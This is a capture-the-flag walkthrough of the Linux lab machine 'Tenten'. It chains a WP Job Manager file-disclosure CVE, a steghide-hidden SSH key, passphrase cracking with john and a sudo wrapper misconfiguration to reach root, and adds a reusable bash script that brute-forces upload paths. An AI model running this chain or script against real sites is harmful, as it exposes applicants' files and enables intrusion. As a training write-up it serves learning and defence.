Difficulty Rating:

Machine: Tenten
OS: Linux
Target IP: 10.10.10.10
Source IP: 10.10.15.8

  • Nmap
$ sudo nmap -A -Pn -sV -O -oN tenten_nmap.txt 10.10.10.10

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-22 14:05 IST
Nmap scan report for 10.10.10.10
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.8 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.8 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   236.28 ms 10.10.14.1
2   236.89 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.47 seconds
  • Wpscan
$ sudo wpscan -u http://10.10.10.10 -e --log tenten_wpscan.txt
[+] We found 1 plugins:

[+] Name: job-manager - v7.2.5
 |  Latest version: 0.7.25 (up to date)
 |  Last updated: 2015-08-25T22:44:00.000Z
 |  Location: http://10.10.10.10/wp-content/plugins/job-manager/
 |  Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | takis | takis |
    | 2  | user1 | user1 |
    +----+-------+-------+
  • The job-manager plugin is affected by CVE-2015-6668, an insecure direct object reference in WP Job Manager: files uploaded by applicants land in WordPress's default uploads directory under a predictable path, and the plugin does nothing to stop an unauthenticated visitor who knows (or guesses) the filename from downloading them.
  • Visit http://10.10.10.10/index.php/, open Jobs Listing and click Apply.
  • The browser lands on http://10.10.10.10/index.php/jobs/apply/8/.
  • The trailing number is the WordPress post ID of the listing (the primary key in the wp_posts table), so other listings can be reached simply by changing it.


  • Iterate over the IDs and pull each page's <title> to see which listings exist:
$ for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! &#8211; Job Portal</title>
2: <title>Job Application: Sample Page &#8211; Job Portal</title>
3: <title>Job Application: Auto Draft &#8211; Job Portal</title>
4: <title>Job Application &#8211; Job Portal</title>
5: <title>Job Application: Jobs Listing &#8211; Job Portal</title>
6: <title>Job Application: Job Application &#8211; Job Portal</title>
7: <title>Job Application: Register &#8211; Job Portal</title>
8: <title>Job Application: Pen Tester &#8211; Job Portal</title>
9: <title>Job Application:  &#8211; Job Portal</title>
10: <title>Job Application: Application &#8211; Job Portal</title>
11: <title>Job Application: cube &#8211; Job Portal</title>
12: <title>Job Application: Application &#8211; Job Portal</title>
13: <title>Job Application: HackerAccessGranted &#8211; Job Portal</title>
14: <title>Job Application: Application &#8211; Job Portal</title>
15: <title>Job Application: Application &#8211; Job Portal</title>
16: <title>Job Application: Application &#8211; Job Portal</title>
17: <title>Job Application: Application &#8211; Job Portal</title>
18: <title>Job Application: Application &#8211; Job Portal</title>
19: <title>Job Application: shell &#8211; Job Portal</title>
20: <title>Job Application: Application &#8211; Job Portal</title>
  • ID 13, titled HackerAccessGranted, stands out.
  • According to the CVE, the plugin leaves the applicant's upload in WordPress's default, predictable location:

The WordPress directory structure for uploaded files is known: /wp-content/uploads/%year%/%month%/%filename%

  • Nothing on the site reveals the year/month directory or the file extension, so both have to be guessed (the CVE describes exactly this brute force); here the file turns out to be an April 2017 JPEG.

  • Visit http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
  • Download the image
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
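Putting the two steps together, here is an added helper script (not part of the original writeup) that walks the application IDs and records each page's title, then brute-forces the upload path for a chosen filename stem across a year range, all twelve months and a list of extensions, reporting the URLs that answer 200. The target, ID range, year range and extension list are assumptions to be adjusted per engagement; the title parsing is tuned to the "Job Application: … &#8211; Job Portal" pattern seen above.

```bash
#!/usr/bin/env bash
# Added helper, not part of the original writeup: automate the two steps
# above for CVE-2015-6668-style CV disclosure in WP Job Manager.
#   1. walk /index.php/jobs/apply/<id>/ and record each page's <title>
#   2. brute-force wp-content/uploads/YYYY/MM/<stem>.<ext> for a stem of
#      interest, since the upload month and extension are never disclosed
# Target, ID range, year range and extension list are assumptions.
TARGET="${TARGET:-http://10.10.10.10}"

# Reduce a page's <title> to the job/post name: strip the
# "Job Application: " prefix and the " &#8211; Job Portal" suffix.
# Reads HTML on stdin, prints one line (empty if the title is empty).
title_from_html() {
    sed -n 's#.*<title>\(.*\)</title>.*#\1#p' \
      | sed -e 's/^Job Application: *//' -e 's/ *&#8211; *Job Portal$//' \
      | head -n 1
}

# Print "<id><TAB><title>" for each application ID in [first, last]. Needs network.
enumerate_ids() {
    local first="$1" last="$2" i
    i=$first
    while [ "$i" -le "$last" ]; do
        printf '%s\t%s\n' "$i" "$(curl -s "$TARGET/index.php/jobs/apply/$i/" | title_from_html)"
        i=$((i + 1))
    done
}

# Print every candidate upload URL for a filename stem: each year in
# [from, to], all twelve months, each extension given after the year range.
candidate_urls() {
    local stem="$1" from="$2" to="$3" y m e
    shift 3
    y=$from
    while [ "$y" -le "$to" ]; do
        for m in 01 02 03 04 05 06 07 08 09 10 11 12; do
            for e in "$@"; do
                printf '%s/wp-content/uploads/%s/%s/%s.%s\n' "$TARGET" "$y" "$m" "$stem" "$e"
            done
        done
        y=$((y + 1))
    done
}

# Read candidate URLs on stdin, HEAD each one, print those answering 200. Needs network.
find_upload() {
    local url code
    while IFS= read -r url; do
        code=$(curl -s -o /dev/null -I -w '%{http_code}' "$url")
        if [ "$code" = "200" ]; then
            printf '%s\n' "$url"
        fi
    done
}

# Usage (only when invoked with arguments, so the functions can also be sourced):
#   ./cv_enum.sh enum 1 20
#   ./cv_enum.sh find HackerAccessGranted 2016 2017 jpg jpeg png pdf
case "${1:-}" in
    enum) shift; enumerate_ids "$@" ;;
    find) shift; candidate_urls "$@" | find_upload ;;
esac
```

Two years times twelve months times four extensions is 96 HEAD requests per stem, which is why the CVE describes the attack as a brute force rather than a direct download; the month comes from the listing's publication date if the site exposes it, which narrows the search considerably.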
  • Run steghide against the image and press Enter at the passphrase prompt (empty passphrase); it extracts an embedded file:
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase: 
wrote extracted data to "id_rsa".
  • The extracted id_rsa is a passphrase-protected private key. Convert it to a John-compatible hash with sshng2john:
$ python sshng2john.py id_rsa > id_rsa.encrypted
  • Crack the passphrase with john and the rockyou wordlist:
$ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
1g 0:00:00:12 DONE (2017-08-22 16:28) 0.07782g/s 1116Kp/s 1116Kc/s 1116KC/s *7¡Vamos!
Session completed
  • SSH in as takis with the recovered key (passphrase superpassword) and check what sudo allows:
$ ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ fuckin
takis@tenten:~$ fuckin ls
user.txt
takis@tenten:~$ fuckin id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
takis@tenten:~$ strings /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
  • So /bin/fuckin is a two-line bash script that runs whatever its first four arguments spell out, with no validation at all. Run normally it just executes the command as takis (hence the fuckin id output above). The first sudoers entry, (ALL : ALL) ALL, would require takis's password, which we do not have (we logged in with a key); the NOPASSWD entry for /bin/fuckin requires nothing, and because the wrapper executes arbitrary arguments, sudo fuckin <command> is a passwordless way to run any command as root:
takis@tenten:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)
takis@tenten:~$ sudo fuckin cat /root/root.txt
XXXXXX
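The whole privilege escalation rests on those two lines of /bin/fuckin, so it is worth seeing the insecure pattern beside a corrected one. Below is an added example (not from the original writeup or the machine itself): the page's wrapper reproduced as a shell function, and a variant that only runs an allow-listed command name with plain-word arguments. The allow-list (ls, id, df) and the argument rules are assumptions chosen for illustration; the point is that a sudo NOPASSWD wrapper must constrain what it executes, or the sudoers line is equivalent to NOPASSWD: ALL.

```bash
#!/bin/bash
# Added example, not from the original writeup. `strings /bin/fuckin` shows
# the wrapper is just "$1 $2 $3 $4", so the sudoers line
# "(ALL) NOPASSWD: /bin/fuckin" is equivalent to NOPASSWD: ALL. Below is that
# wrapper as a function, beside a variant that only runs allow-listed
# command names with plain-word arguments. The allow-list is an assumption.

# Insecure form (behaviour of the page's wrapper): the caller's first four
# arguments are expanded unquoted and executed with the wrapper's privileges.
# A single argument containing spaces is word-split into a whole command line.
insecure_wrapper() {
    $1 $2 $3 $4
}

# Return 0 when argv is acceptable: a bare command name from the allow-list
# (no path, so sudo's secure_path decides what actually runs) followed by
# arguments that are plain words: no options, no shell metacharacters, no
# path traversal. Anything else returns 1.
allowed_command() {
    local cmd="$1" arg
    shift
    case "$cmd" in
        ls|id|df) ;;                               # allow-list (assumption)
        *) return 1 ;;
    esac
    for arg in "$@"; do
        case "$arg" in
            -*)                   return 1 ;;      # no options
            *[!A-Za-z0-9_./-]*)   return 1 ;;      # no spaces, ; | $ ` quotes ...
            *..*)                 return 1 ;;      # no traversal
        esac
    done
    return 0
}

# Hardened form: validate, then run the command with each argument passed
# through intact ("$@"), never rebuilt from an unquoted string.
hardened_wrapper() {
    if ! allowed_command "$@"; then
        printf 'refused: %s\n' "$*" >&2
        return 126
    fi
    command "$@"
}
```

Even the hardened variant is only as safe as its allow-list: a command that can write files, spawn an editor or read arbitrary paths (cat, vi, find with -exec) turns a NOPASSWD wrapper straight back into root, so the list should be reviewed against GTFOBins-style escapes before it goes into sudoers.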
User and Root owned!!

Share the fun!